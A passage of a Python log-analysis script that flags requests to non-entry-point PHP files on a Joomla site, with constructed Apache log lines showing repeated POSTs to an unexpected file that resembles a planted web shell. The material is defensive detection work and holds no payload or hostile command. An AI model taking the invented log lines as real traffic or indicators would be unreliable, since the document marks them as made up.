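files that are not Joomla entry points. ENTRY_POINTS and the log lines below
are assumptions constructed for this example."""
import re
from collections import Counter

# Assumption: a stock Joomla 1.5 site only needs these PHP files to be
# requested directly; add any others your site legitimately exposes.
ENTRY_POINTS = {"/index.php", "/index2.php",
                "/administrator/index.php", "/administrator/index2.php"}

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')


def suspicious_php_hits(lines):
    """Return (path, method, ip) for every request to a .php file that is
    not an entry point, regardless of method; query strings are ignored."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if path.lower().endswith(".php") and path not in ENTRY_POINTS:
            hits.append((path, m["method"], m["ip"]))
    return hits


def summarize(lines):
    """Count hits per path so a burst of POSTs to one odd file stands out."""
    return Counter(path for path, _, _ in suspicious_php_hits(lines))


# Constructed sample lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Sep/2016:09:01:12 +0000] "POST /libraries/phpxmlrpc/compat/article48.php HTTP/1.1" 200 15 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Sep/2016:09:01:13 +0000] "POST /libraries/phpxmlrpc/compat/article48.php HTTP/1.1" 200 15 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Sep/2016:09:02:44 +0000] "GET /index.php?option=com_content&id=4 HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Sep/2016:09:03:01 +0000] "GET /js/analytic.php?id=4&tz=60&rs=800x600 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Sep/2016:09:03:02 +0000] "GET /images/stories/logo.png HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for path, n in summarize(SAMPLE_LOG).most_common():
        print(f"{n:4d}  {path}")
```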

